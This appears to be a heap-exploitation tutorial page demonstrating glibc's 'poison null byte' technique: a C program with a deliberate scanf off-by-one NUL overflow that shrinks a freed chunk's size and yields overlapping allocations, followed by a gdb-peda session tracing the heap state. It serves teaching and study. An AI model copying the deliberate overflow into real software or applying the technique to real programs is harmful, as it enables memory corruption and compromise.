
List

Conditions

Exploit plan

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
 * Poison-null-byte demonstration (the binary debugged below as
 * "poisonNullByte"). Every step is deliberate: the program shows how a
 * single off-by-one NUL write into a heap chunk's size field lets a
 * later allocation overlap a buffer that is still in use. Heap addresses
 * quoted in the comments are the ones observed in the gdb session on
 * this page; under another libc or heap base they differ, but the
 * sequence of events is the same.
 *
 * Root cause, stated defensively: the scanf() field widths equal the
 * allocation's usable size (0x88 bytes for malloc(0x80), 0x208 bytes for
 * malloc(0x200) on 64-bit glibc), so the terminating NUL that scanf()
 * always appends is written one byte past the usable area. The fix is a
 * width of at most size-1, or fgets(buf, size, stdin). Newer glibc
 * versions also cross-check a chunk's size against the following chunk's
 * prev_size, which detects this corruption unless a consistent prev_size
 * has been planted.
 */
int main()
{	
	// Three adjacent chunks: 0x602000 (size 0x91), 0x602090 (size 0x211),
	// 0x6022a0 (size 0x91), followed by the top chunk at 0x602330.
	char *buf1 = malloc(0x80);
	char *buf2 = malloc(0x200);
	char *buf3 = malloc(0x80);

	// 512 bytes + NUL = 513 bytes into a chunk whose usable area is
	// 0x208 bytes; the NUL lands in the next chunk's prev_size field,
	// which glibc treats as usable data while buf2 is allocated, so no
	// header is corrupted yet. (The gdb session additionally patches the
	// last qword of buf2, 0x602290, to 0x200 by hand; the page does not
	// say why -- presumably so that a prev_size consistent with the
	// shrunk size below exists where newer glibc looks for it.)
	scanf("%512s",buf2);

	// A 0x210 chunk is above the fastbin range, so it goes to the
	// unsorted bin (fd/bk point into main_arena, bins[1] == 0x602090);
	// the following chunk's prev_size becomes 0x210 with PREV_INUSE
	// cleared.
	free(buf2);

	// The off-by-one: 136 == 0x88 fills buf1's whole usable area and
	// scanf's terminating NUL overwrites the low byte of buf2's size
	// field at 0x602098, turning 0x211 into 0x200. The allocator now
	// believes the free chunk is 0x10 bytes shorter, while the chunk at
	// 0x6022a0 still records prev_size 0x210.
	scanf("%136s",buf1);	

	// Both requests are split off the shrunk free chunk: buf4 = 0x6020a0,
	// buf5 = 0x602130, remainder (size 0xe1) at 0x6021b0. The remainder's
	// prev_size is written at 0x602290, not at the real next chunk
	// 0x6022a0, so the stale 0x210 there survives.
	char *buf4 = malloc(0x80);
	char *buf5 = malloc(0x80);

	// Marker fill so the later overlap is visible in memory.
	memset(buf5,'A',0x80);

	// Order matters. buf4 returns to the unsorted bin first. Freeing buf3
	// then consolidates backward using the stale prev_size 0x210, i.e.
	// with the chunk at 0x602090, and forward with top: top becomes
	// 0x602090 with size 0x20f71, even though buf5 in the middle of that
	// range is still allocated.
	free(buf4);
	free(buf3);
	
	// Served from the merged region: buf6 = 0x6020a0 with chunk size
	// 0x291, which spans the live buf5 (0x602130..0x6021b0) and the
	// 0xe1 free chunk's header. The memset overwrites buf5's 'A' fill
	// with 'B' -- the overlapping-chunk condition this demo exists to
	// show.
	char *buf6 = malloc(0x280);
	memset(buf6,'B',0x280);
}

Exploit flow

Debugging

gdb-peda$ b *0x0000000000400670
Breakpoint 1 at 0x400670
gdb-peda$ b *0x0000000000400681
Breakpoint 2 at 0x400681
gdb-peda$ b *0x0000000000400697
Breakpoint 3 at 0x400697
gdb-peda$ b *0x00000000004006a1
Breakpoint 4 at 0x4006a1
gdb-peda$ b *0x00000000004006af
Breakpoint 5 at 0x4006af
gdb-peda$ b *0x00000000004006c9
Breakpoint 6 at 0x4006c9
gdb-peda$ b *0x00000000004006d5
Breakpoint 7 at 0x4006d5
gdb-peda$ b *0x00000000004006e1
Breakpoint 8 at 0x4006e1
gdb-peda$ b *0x00000000004006eb
Breakpoint 9 at 0x4006eb
gdb-peda$ b *0x0000000000400705
Breakpoint 10 at 0x400705
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/poisonNullByte 
Breakpoint 1, 0x0000000000400670 in main ()

gdb-peda$ x/104gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x0000000000000000	0x0000000000000000
...
0x602080:	0x0000000000000000	0x0000000000000000
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x0000000000000000	0x0000000000000000
...
0x602290:	0x0000000000000000	0x0000000000000000
0x6022a0:	0x0000000000000000	0x0000000000000091
0x6022b0:	0x0000000000000000	0x0000000000000000
...
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ ni
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

0x0000000000400675 in main ()
gdb-peda$ x/66gx 0x6020a0
0x6020a0:	0x4343434343434343	0x4343434343434343
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x4343434343434343	0x4343434343434343
0x602130:	0x4343434343434343	0x4343434343434343
0x602140:	0x4343434343434343	0x4343434343434343
0x602150:	0x4343434343434343	0x4343434343434343
0x602160:	0x4343434343434343	0x4343434343434343
0x602170:	0x4343434343434343	0x4343434343434343
0x602180:	0x4343434343434343	0x4343434343434343
0x602190:	0x4343434343434343	0x4343434343434343
0x6021a0:	0x4343434343434343	0x4343434343434343
0x6021b0:	0x4343434343434343	0x4343434343434343
0x6021c0:	0x4343434343434343	0x4343434343434343
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x4343434343434343	0x4343434343434343
0x6022a0:	0x0000000000000000	0x0000000000000091
gdb-peda$ set *0x602290 = 0x200
gdb-peda$ set *0x602294 = 0x0
gdb-peda$ x/gx 0x602290
0x602290:	0x0000000000000200
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400681 in main ()
gdb-peda$ x/6gx 0x602090
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$ 

gdb-peda$ p main_arena.bins[1]
$1 = (mchunkptr) 0x602090
gdb-peda$ c
Continuing.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Breakpoint 3, 0x0000000000400697 in main ()
gdb-peda$ x/24gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x4444444444444444	0x4444444444444444
0x602020:	0x4444444444444444	0x4444444444444444
0x602030:	0x4444444444444444	0x4444444444444444
0x602040:	0x4444444444444444	0x4444444444444444
0x602050:	0x4444444444444444	0x4444444444444444
0x602060:	0x4444444444444444	0x4444444444444444
0x602070:	0x4444444444444444	0x4444444444444444
0x602080:	0x4444444444444444	0x4444444444444444
0x602090:	0x4444444444444444	0x0000000000000200
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006a1 in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602120
gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006af in main ()
gdb-peda$ i r rax
rax            0x602130	0x602130
gdb-peda$ p main_arena.bins[1]
$3 = (mchunkptr) 0x6021b0
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 6, 0x00000000004006c9 in main ()
gdb-peda$ x/18gx 0x602130
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006d5 in main ()
gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000091
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x0000000000602090
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 8, 0x00000000004006e1 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000020f71
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006eb in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd3888	0x00007ffff7dd3888
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
gdb-peda$ c
Continuing.
Breakpoint 10, 0x0000000000400705 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x4242424242424242	0x4242424242424242
0x6020b0:	0x4242424242424242	0x4242424242424242
0x6020c0:	0x4242424242424242	0x4242424242424242
0x6020d0:	0x4242424242424242	0x4242424242424242
0x6020e0:	0x4242424242424242	0x4242424242424242
0x6020f0:	0x4242424242424242	0x4242424242424242
0x602100:	0x4242424242424242	0x4242424242424242
0x602110:	0x4242424242424242	0x4242424242424242
0x602120:	0x4242424242424242	0x4242424242424242
0x602130:	0x4242424242424242	0x4242424242424242
0x602140:	0x4242424242424242	0x4242424242424242
0x602150:	0x4242424242424242	0x4242424242424242
0x602160:	0x4242424242424242	0x4242424242424242
0x602170:	0x4242424242424242	0x4242424242424242
0x602180:	0x4242424242424242	0x4242424242424242
0x602190:	0x4242424242424242	0x4242424242424242
0x6021a0:	0x4242424242424242	0x4242424242424242
0x6021b0:	0x4242424242424242	0x4242424242424242
0x6021c0:	0x4242424242424242	0x4242424242424242
0x6021d0:	0x4242424242424242	0x4242424242424242
0x6021e0:	0x4242424242424242	0x4242424242424242
0x6021f0:	0x4242424242424242	0x4242424242424242
0x602200:	0x4242424242424242	0x4242424242424242
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x4242424242424242	0x4242424242424242
0x602230:	0x4242424242424242	0x4242424242424242
0x602240:	0x4242424242424242	0x4242424242424242
0x602250:	0x4242424242424242	0x4242424242424242
0x602260:	0x4242424242424242	0x4242424242424242
0x602270:	0x4242424242424242	0x4242424242424242
0x602280:	0x4242424242424242	0x4242424242424242
0x602290:	0x4242424242424242	0x4242424242424242
0x6022a0:	0x4242424242424242	0x4242424242424242
0x6022b0:	0x4242424242424242	0x4242424242424242
0x6022c0:	0x4242424242424242	0x4242424242424242
0x6022d0:	0x4242424242424242	0x4242424242424242
0x6022e0:	0x4242424242424242	0x4242424242424242
0x6022f0:	0x4242424242424242	0x4242424242424242
0x602300:	0x4242424242424242	0x4242424242424242
0x602310:	0x4242424242424242	0x4242424242424242
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 

Related information
